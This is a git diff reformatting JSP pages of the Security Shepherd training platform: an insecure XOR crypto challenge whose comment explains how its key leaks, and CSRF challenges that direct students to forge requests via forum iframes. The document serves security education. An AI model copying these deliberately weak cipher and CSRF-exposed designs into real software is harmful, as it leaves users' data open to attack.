index 488c6b608..d605e4058 100644
--- a/src/main/webapp/challenges/2da053b4afb1530a500120a49a14d422ea56705a7e3fc405a77bc269948ccae1.jsp
+++ b/src/main/webapp/challenges/2da053b4afb1530a500120a49a14d422ea56705a7e3fc405a77bc269948ccae1.jsp
@@ -1,144 +1,152 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * This level uses XOR's user input with a key. the vulnerability in the cipher is if the attacker submits spaces, the key will be revealed after the XOR.
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * This level uses XOR's user input with a key. the vulnerability in the cipher is if the attacker submits spaces, the key will be revealed after the XOR.
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
 //No Quotes In level Name
-    String levelName = "Insecure Cyrpto Challenge 3";
+String levelName = "Insecure Cyrpto Challenge 3";
 //Alphanumeric Only
-    String levelHash = "2da053b4afb1530a500120a49a14d422ea56705a7e3fc405a77bc269948ccae1";
+String levelHash = "2da053b4afb1530a500120a49a14d422ea56705a7e3fc405a77bc269948ccae1";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.insecureCryptoStorage.insecureCryptoStorage", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.insecureCryptoStorage.insecureCryptoStorage", locale);
 //Used more than once translations
-    String i18nLevelName = bundle.getString("insecureCryptoStorage.3.challengename");
+String i18nLevelName = bundle.getString("insecureCryptoStorage.3.challengename");
 //Level blurb can be writen here in HTML OR go into the HTML body and write it there. Nobody will update this but you
-    String levelBlurb = bundle.getString("insecureCryptoStorage.3.whatToDo");
+String levelBlurb = bundle.getString("insecureCryptoStorage.3.whatToDo");
 
 //Logs the IP, Forwarded IP that acceeded this level with the level name in the debug for convience. If you want to log more stuff in the JSP use this as an example
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= levelBlurb %>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("insecureCryptoStorage.3.ciphertextToDecrypt") %>
-                </td>
-                <td><input type="text" width="130px" id="userInput"
-                           autocomplete="off"></td>
-            </tr>
-            <tr>
-                <td colspan="2">
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("insecureCryptoStorage.decrypt") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("insecureCryptoStorage.loading") %>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= levelBlurb %>
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("insecureCryptoStorage.3.ciphertextToDecrypt") %>
+					</td>
+					<td><input type="text" width="130px" id="userInput"
+						autocomplete="off"></td>
+				</tr>
+				<tr>
+					<td colspan="2">
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("insecureCryptoStorage.decrypt") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("insecureCryptoStorage.loading") %></p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv">
-        <h2 class="title"><%= bundle.getString("insecureCryptoStorage.3.ciphertextExample") %>
-        </h2>
-        <p><%= bundle.getString("insecureCryptoStorage.3.tryDecryptThis") %>
-            IAAAAEkQBhEVBwpDHAFJGhYHSBYEGgocAw==
-        </p>
-    </div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        var theUserInput = $("#userInput").val();
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    userData: theUserInput
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("insecureCryptoStorage.errorOccurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv">
+			<h2 class="title"><%= bundle.getString("insecureCryptoStorage.3.ciphertextExample") %></h2>
+			<p><%= bundle.getString("insecureCryptoStorage.3.tryDecryptThis") %>
+				IAAAAEkQBhEVBwpDHAFJGhYHSBYEGgocAw==
+			</p>
+		</div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				var theUserInput = $("#userInput").val();
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							userData: theUserInput
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("insecureCryptoStorage.errorOccurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/2e0981dcb8278a57dcfaae3b8da0c78d5a70c2d38ea9d8b3e14db3aea01afcbb.jsp b/src/main/webapp/challenges/2e0981dcb8278a57dcfaae3b8da0c78d5a70c2d38ea9d8b3e14db3aea01afcbb.jsp
index edaf85a9b..0073efece 100644
--- a/src/main/webapp/challenges/2e0981dcb8278a57dcfaae3b8da0c78d5a70c2d38ea9d8b3e14db3aea01afcbb.jsp
+++ b/src/main/webapp/challenges/2e0981dcb8278a57dcfaae3b8da0c78d5a70c2d38ea9d8b3e14db3aea01afcbb.jsp
@@ -1,177 +1,181 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * Cross Site Request Forgery Challenge NEW
-     *
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
-    String levelName = "CSRF Challenge JSON";
-    String levelHash = new String("2e0981dcb8278a57dcfaae3b8da0c78d5a70c2d38ea9d8b3e14db3aea01afcbb");
-
+/**
+ * Cross Site Request Forgery Challenge NEW
+ *
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ * 
+ * @author Mark Denihan
+ */
+ String levelName = "CSRF Challenge JSON";
+ String levelHash = new String("2e0981dcb8278a57dcfaae3b8da0c78d5a70c2d38ea9d8b3e14db3aea01afcbb");
+ 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.csrf.csrfStrings", locale);
-    String i18nLevelName = bundle.getString("title.csrfJson");
-
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.csrf.csrfStrings", locale);
+String i18nLevelName = bundle.getString("title.csrfJson");
 
-            String ApplicationRoot = getServletContext().getRealPath("");
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
-            String userClass = null;
-            if (ses.getAttribute("userClass") != null) {
-                userClass = Encode.forHtml(ses.getAttribute("userClass").toString());
-            }
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ 		// Getting Session Variables
+		//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+		
+		String ApplicationRoot = getServletContext().getRealPath("");
+		String csrfToken = Encode.forHtml(tokenCookie.getValue());
+		String userClass = null;
+		if(ses.getAttribute("userClass") != null)
+		{
+			userClass = Encode.forHtml(ses.getAttribute("userClass").toString());
+		}
+		String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.intro") %>
-        <br/> <br/> <a> POST /user/csrfchallengejson/plusplus</a> <br/>
-            <%= bundle.getString("challenge.inJson") %>
-        <a>{"userId":"<%= bundle.getString("challenge.userIdExample") %>"}
-        </a> <br/> <br/>
-            <%= bundle.getString("challenge.whereIdIsUserBeenIncremented.1") %>
-            <%= bundle.getString("challenge.userIdExample") %>
-            <%= bundle.getString("challenge.whereIdIsUserBeenIncremented.2") %>
-            <%=bundle.getString("challenge.yourIdIs") %><a><%= userId %>
-    </a>
-            <%= bundle.getString("challenge.yourIdIs.1") %>
-        <br/> <br/>
-            <%= bundle.getString("challenge.useForumForIframe") %>
-            <%
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.intro") %>
+			<br /> <br /> <a> POST /user/csrfchallengejson/plusplus</a> <br />
+			<%= bundle.getString("challenge.inJson") %>
+			<a>{"userId":"<%= bundle.getString("challenge.userIdExample") %>"}
+			</a> <br /> <br />
+			<%= bundle.getString("challenge.whereIdIsUserBeenIncremented.1") %>
+			<%= bundle.getString("challenge.userIdExample") %><%= bundle.getString("challenge.whereIdIsUserBeenIncremented.2") %>
+			<%=bundle.getString("challenge.yourIdIs") %><a> <%= userId %></a>
+			<%= bundle.getString("challenge.yourIdIs.1") %>
+			<br /> <br />
+			<%= bundle.getString("challenge.useForumForIframe") %>
+			<% 
 				String moduleId = Getter.getModuleIdFromHash(ApplicationRoot, levelHash);	
 				if (Getter.isCsrfLevelComplete(ApplicationRoot, moduleId, userId)) 
 				{ %>
+		
+		<h2 class='title'><%= bundle.getString("result.challengeCompleted") %></h2>
+		<p>
+			<%= bundle.getString("result.congratsTheKeyIs") %>
+			<b> <a><%=	Hash.generateUserSolution(Getter.getModuleResult(ApplicationRoot, moduleId), (String)ses.getAttribute("userName")) %></a></b><br />
+			<br />
+			<% } %>
+		
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td><%= bundle.getString("forum.iframe.whatToDo") %></td>
+				</tr>
+				<tr>
+					<td><input style="width: 400px;" id="myMessageAris"
+						type="text" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("forum.postMessage") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("forum.loading") %></p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <h2 class='title'><%= bundle.getString("result.challengeCompleted") %>
-    </h2>
-    <p>
-            <%= bundle.getString("result.congratsTheKeyIs") %>
-        <b>
-            <a><%=    Hash.generateUserSolution(Getter.getModuleResult(ApplicationRoot, moduleId), (String) ses.getAttribute("userName")) %>
-            </a></b><br/>
-        <br/>
-            <% } %>
-
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td><%= bundle.getString("forum.iframe.whatToDo") %>
-                </td>
-            </tr>
-            <tr>
-                <td><input style="width: 400px;" id="myMessageAris"
-                           type="text"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("forum.postMessage") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("forum.loading") %>
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
-
-    <div id="resultsDiv">
-        <%= Getter.getCsrfForumWithIframe(ApplicationRoot, userClass, Getter.getModuleIdFromHash(ApplicationRoot, levelHash), bundle) %>
-    </div>
-    </p>
-</div>
-<script>
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var theMessage = $("#myMessageAris").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                dataType: "text",
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    myMessage: theMessage,
-                    csrfToken: "<%= csrfToken %>"
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv">
+			<%= Getter.getCsrfForumWithIframe(ApplicationRoot, userClass, Getter.getModuleIdFromHash(ApplicationRoot, levelHash), bundle) %>
+		</div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var theMessage = $("#myMessageAris").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						dataType: "text",
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							myMessage: theMessage,
+							csrfToken: "<%= csrfToken %>"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/2fff41105149e507c75b5a54e558470469d7024929cf78d570cd16c03bee3569.jsp b/src/main/webapp/challenges/2fff41105149e507c75b5a54e558470469d7024929cf78d570cd16c03bee3569.jsp
index e29f2158d..c23d7efb7 100644
--- a/src/main/webapp/challenges/2fff41105149e507c75b5a54e558470469d7024929cf78d570cd16c03bee3569.jsp
+++ b/src/main/webapp/challenges/2fff41105149e507c75b5a54e558470469d7024929cf78d570cd16c03bee3569.jsp
@@ -1,178 +1,181 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
-         errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java"
+	import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+	errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
-    String levelName = "Cross Site Request Forgery Challenge 6";
-    String levelHash = "2fff41105149e507c75b5a54e558470469d7024929cf78d570cd16c03bee3569";
+/**
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ * 
+ * @author Mark Denihan
+ */
+String levelName = "Cross Site Request Forgery Challenge 6";
+String levelHash = "2fff41105149e507c75b5a54e558470469d7024929cf78d570cd16c03bee3569";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.csrf.csrfStrings", locale);
-    String i18nLevelName = bundle.getString("title.csrf6");
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.csrf.csrfStrings", locale);
+String i18nLevelName = bundle.getString("title.csrf6");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            // Getting Session Variables
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
-            String ApplicationRoot = getServletContext().getRealPath("");
-            String csrfToken = Encode.forHtml(tokenCookie.getValue());
-            String userClass = null;
-            if (ses.getAttribute("userClass") != null) {
-                userClass = Encode.forHtml(ses.getAttribute("userClass").toString());
-            }
-            String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+		// Getting Session Variables
+		//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+		
+		String ApplicationRoot = getServletContext().getRealPath("");
+		String csrfToken = Encode.forHtml(tokenCookie.getValue());
+		String userClass = null;
+		if(ses.getAttribute("userClass") != null)
+		{
+			userClass = Encode.forHtml(ses.getAttribute("userClass").toString());
+		}
+		String userId = Encode.forHtml(ses.getAttribute("userStamp").toString());
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.intro") %>
-        <br/> <br/> <a> POST /user/csrfchallengesix/plusplus</a> <br/>
